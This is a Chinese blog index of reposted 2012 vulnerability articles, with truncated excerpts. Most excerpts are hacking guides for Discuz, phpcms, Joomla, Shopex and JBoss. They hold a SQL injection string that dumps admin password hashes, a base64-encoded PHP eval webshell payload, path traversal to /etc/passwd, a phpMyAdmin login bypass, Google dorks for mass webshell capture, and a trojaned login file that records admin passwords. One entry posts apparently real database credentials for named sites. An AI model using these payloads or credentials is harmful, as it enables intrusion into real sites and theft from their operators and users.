漏洞
fengling132
这个作者很懒,什么都没留下…
展开
-
MS12-020:远程桌面中的漏洞可能允许远程代码执行:2012 年 3 月 13 日
受影响的软件 操作系统最大安全影响综合严重等级此更新替代的公告Windows XP Service Pack 3(KB2621440)远程执行代码严重MS11-065 中的 KB2570222 由 KB2621440 替代Windows XP Professi转载 2012-04-03 11:33:19 · 2619 阅读 · 0 评论 -
PHP 5.4 (5.4.3) Code Execution (Win32)
// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32)// Exploit author: 0in (Maksymilian Motyl)// Email: 0in(dot)email(at)gmail.com// * Bug with Variant type parsing originally discovered b转载 2012-05-21 16:40:11 · 996 阅读 · 1 评论 -
正方高校教务管理系统漏洞修复
正方高校教务管理系统是一款学生成绩,选课管理系统,目前有众多高校使用这款教务管理系统。近期该系统爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限。下面给出漏洞的情况和修复方法:漏洞类型:上传漏洞漏洞文件:/ftb.imagegallery.aspx该漏洞文件没有任何权限限制,访问者可以直接访问该文件,从而通过文件自有的上传功能,来上传构造好的可以解析的后门文件。转载 2012-06-15 23:19:05 · 5910 阅读 · 0 评论 -
AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业
漏洞概要关注数(36) 关注此漏洞缺陷编号: WooYun-2012-06672漏洞标题: AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业相关厂商: AnyMacro Mail漏洞作者: 松子提交时间: 2012-05-04公开时间: 2012-06-18漏洞类型: 非授权访问/权限绕过危害等级转载 2012-06-19 09:00:08 · 10478 阅读 · 0 评论 -
WordPress Sitemile Auctions插件任意文件上传漏洞
发布日期:2012-06-19更新日期:2012-06-20受影响系统:WordPress Sitemile Auctions Plugin 2.x描述:WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。Sitemile Auctions Plugi转载 2012-06-23 16:47:28 · 2774 阅读 · 0 评论 -
南方数据编辑器southidceditor最新注入0day漏洞
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7直接暴管理员帐号密码(md5)2.登陆后台3.利用编辑器上传:访问转载 2012-06-30 15:34:05 · 6129 阅读 · 0 评论 -
Shopex 4.8.5 SQL Injection Exp
function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http://" + url; } doc转载 2012-07-02 15:14:05 · 611 阅读 · 0 评论 -
PHPcmsV9任意文件读取漏洞拿Shell
编辑:madman 日期:2012-07-29 分类:技术文章, 最新漏洞 评论:9条评论简介:作者:Return 前几天爆的phpcmsV9任意文件读取漏洞,其实危害是很大的,但往往还是一些管理员 觉得漏洞并不可怕,听到某人说道,即使是被人读取了数据库数据也没用,为啥,因为 他权限数据库权限单库单用户,并且v9制作前台cms发布里面就只有管理员账户并且不发 分子拿到密码也没用因为破解转载 2012-08-02 21:57:53 · 1518 阅读 · 0 评论 -
发一批 phpcmsV9 系统漏洞mysql
编辑:madman 日期:2012-08-02 分类:最新漏洞 评论:6条评论简介:一批 phpcmsV9 系统漏洞 批量扫描到的mysql 后面为yes大多数是可以外连的,偶尔几个不可以。需要工具的联系我。 至于怎么连接以及拿shell 请看:http://madman.in/madman5/871.htm www.tj180.com—-root—-Hlj.com@)!!db—-hu转载 2012-08-02 21:56:36 · 2122 阅读 · 0 评论 -
phpcms V9最新漏洞利用工具
工具作者:B0y疯子博客《http://Madman.in》工具下载:工具下载地址利用方法:先打开 1.bat然后 把输入命令 php9 madman.in 回车键 谷歌关键字:Powered by PHPCMS v9 © 2012转载 2012-07-25 17:50:34 · 4564 阅读 · 0 评论 -
joomla CMS后台另类拿WebShell方法
漏洞概要关注数(0) 关注此漏洞缺陷编号: WooYun-2011-02640漏洞标题: joomla CMS后台另类拿WebShell方法相关厂商: joomla CMS漏洞作者: akacd提交时间: 2011-08-07公开时间: 2011-08-07漏洞类型: 命令执行危害等级: 中自评Rank: 7转载 2012-08-15 16:47:03 · 2792 阅读 · 0 评论 -
利用JBoss漏洞拿webshell方法
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell,由于是研究,因此仅仅点到为止。 一、信息收集与整理 1.使用漏洞特征进行搜索转载 2012-08-15 13:12:50 · 17994 阅读 · 0 评论 -
Joomla远程上传漏洞 可直接getshell
作者:1337 1. 有些joomal需要先注册. http://site/index.php?option=com_user&view=login 2. 到上传地址 http://www.2cto.com /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en 3.转载 2012-08-15 16:39:52 · 2693 阅读 · 0 评论 -
批量拿joomla的webshell
本次批量拿的webshell都是php的,而且大都是linux服务器搭建的,大家不要去搞破坏!首先,Google:核心是 Joomla!. 有效 XHTML 和 CSS. 打开网址,加上后缀:index.php?option=com_user&view=reset&layout=confirm来到确认用户页面,提示你要输入暗号,我们输入单引号 ' ,点击发送,转载 2012-08-15 16:48:42 · 3423 阅读 · 0 评论 -
良精企业通用建站系统漏洞总汇
一,SQl注入漏洞1,典型的Cookies注入漏洞文件:Shownews.asp问题代码:id=cstr(request(“id”))Set rsnews=Server.CreateObject(“ADODB.RecordSet”)sql=”update news set hits=hits+1 where id=”&idconn.execute sqlsq转载 2012-06-05 12:12:03 · 2198 阅读 · 0 评论 -
D-Link DSL-2640U路由器0day,免密码查看PPoE账户密码
D-Link的路由器很多都有这种漏洞,不只这一款,冰山一角而已,把下面代码保存为html文件就可以了。1html>2body onload="javascript:document.forms[0].submit()">3H2>Please Wait Whil转载 2012-05-14 16:00:10 · 1335 阅读 · 0 评论 -
phpmyadmin使用@符号绕过登录漏洞
这个漏洞好像还蛮隐秘的,今天就说下吧影响版本:phpmyadmin 2.11.3phpmyadmin 2.11.4利用方式:直接在phpmyadmin的用户名内填入:‘localhost’@'@”不用填入密码,可以直接登录,管理权限哦。[......]转载 2012-05-14 16:01:00 · 3567 阅读 · 0 评论 -
百度文库免财富值下载漏洞
1.比如说这个需要5个财富值 http://wenku.baidu.com/view/f149bec30c22590102029d4c.html 2.我们可以更改它的地址 http://wapwenku.baidu.com/view/f149bec30c22590102029d4c.html ; 3.这样只要复制到自己新建原创 2012-03-20 19:59:29 · 1305 阅读 · 0 评论 -
搜索引擎泄露身份证
漏洞详情披露状态:2012-04-28: 细节已通知厂商并且等待厂商处理中2012-05-02: 厂商已经主动忽略漏洞,细节向公众公开简要描述:百度谷歌等搜索引擎搜索特定关键字泄漏民众身份信息详细说明:搜索xls类型的文件,关键字为身份证,就能搜到包含私密信息的电子表格漏洞证明:百度或google“身份证 filetype:x转载 2012-05-02 14:39:17 · 1301 阅读 · 0 评论 -
天空教室重大漏洞
漏洞概要关注数(3) 关注此漏洞缺陷编号: WooYun-2012-06264漏洞标题: 天空教室重大漏洞相关厂商: 南京易学信息技术有限公司漏洞作者: LinuxPad提交时间: 2012-04-22公开时间: 2012-04-22漏洞类型: 设计缺陷/逻辑错误危害等级: 高自评Rank: 11漏洞状态:转载 2012-05-02 15:11:02 · 1313 阅读 · 0 评论 -
XSS获取管理后台实战
一直想写可没空写,既然Trojan 整理出来我就发下。其实也就是个类似QQ马发信的代码.request接受数据,然后创建文件流123456789101112131415161718192021222324252627282930313233转载 2012-05-02 15:19:54 · 2672 阅读 · 0 评论 -
mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替 2. or 用||代替 3.union select from 变成 /*!union*/这种。 一个例子: http://www.webshell.cc/ select 1 /*!union*/ select 2 from adad where 1&&1转载 2012-05-02 15:27:08 · 570 阅读 · 0 评论 -
提交’时提示ip被记录 防注入系统的利用。
很多朋友在入侵提权的时候都有会遇见,站点纪录了自己的IP。本文就教大家查看本机信息存在对方站点的漏洞,防止被利用例如:网址:http://www.92hack.net/newslist.asp?id=122′提示“你的操作已被记录!”等信息。利用方法:www.92hack.net/sqlin.asp 看是否存在,存在提交http://www.92hack.net转载 2012-04-23 10:34:29 · 1600 阅读 · 0 评论 -
Discuz! X2 SQL注射漏洞 0day
@Discuz! X2 SQL注射漏洞 0day 文件:source\module\forum\forum_attachment.php if(!defined('IN_DISCUZ')) {exit('Access Denied');}define('NOROBOT', TRUE);@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t转载 2012-05-02 14:47:51 · 1051 阅读 · 0 评论 -
PHPWIND得到管理员密码的方法
有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?在登录文件做手脚啊...我来贴一个我修改的.login.php里面替换掉对应的部分就OK了. [Copy to clipboard] [ - ]CODE:if($action=="login"){/*记录他的问题和答案修改开始*/$ques=($_POST['question']!=='-1') ? $转载 2012-05-02 14:56:52 · 1416 阅读 · 0 评论 -
MS12-032的POC
微软发布了ms12-032的补丁:http://technet.microsoft.com/en-us/security/bulletin/ms12-032这个补丁是与TCP/IP协议有关的一个栈溢出问题,可以导致本地提权,目前微软已经要求StackOverflow.com移除这些代码。老外是这么说的,尝试绑定一个IPV6-mapped IPV4 address,目前只转载 2012-05-10 14:10:16 · 568 阅读 · 0 评论 -
漏洞标题: 中国移动mas2.0平台系统漏洞
漏洞详情披露状态:2012-03-26: 细节已通知厂商并且等待厂商处理中2012-03-26: 厂商已经确认,细节仅向厂商公开2012-04-05: 细节向核心白帽子及相关领域专家公开2012-04-15: 细节向普通白帽子公开2012-04-25: 细节向见习白帽子公开2012-05-10: 细节向公众公开简要描述:MAS是中国移动的短信转载 2012-05-10 15:01:54 · 2089 阅读 · 0 评论 -
Discuz NT 多个版本文件上传漏洞
文章作者:rebeyond信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。受影响版本:貌似都受影响。漏洞文件:tools/ajax.aspx漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客转载 2012-05-09 13:43:45 · 1581 阅读 · 0 评论 -
PPLIVE源代码泄露及两个struts命令执行漏洞
配置不当导致网站源代码泄露 svn导致网站源代码泄露http://home.pplive.com/.svn/text-base/SQLDao.jsp.svn-base修复方案:http://www.xxx.com/Article/201203/124841.htmlhome.pplive.com很老的struts命令执行漏洞 pptv 商城 与passp转载 2012-05-10 14:48:30 · 519 阅读 · 0 评论 -
X7 Chat 2.0.5.1及以下版本CSRF添加管理员缺陷及修复
标题: X7 Chat 2.0.5.1 CSRF Add Admin Exploit 关键词: intitle:"Chat Room" "Powered By X7 Chat 2.0.5" 作者: DennSpec 下载地址: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip 影响版本: 首先注册获得一个用转载 2012-05-10 14:53:13 · 560 阅读 · 0 评论 -
DZ!2.5 后台拿 WebShell 方法!
直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。1.注册任意账户2.登陆用户,发表blog日志(注意是日志)3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}转载 2012-05-09 13:53:46 · 1800 阅读 · 0 评论 -
SpeedCMS任意文件下载读取漏洞
作者:90sex90sec《www.90sec.org》163微论坛《www.admin163.net》关键字:inurl:article/file/cidhttp://admin163.net/article/file/cid/ ... ../../../etc/passwd数据库下载地址:?file=../../../..转载 2012-08-31 17:28:18 · 1544 阅读 · 0 评论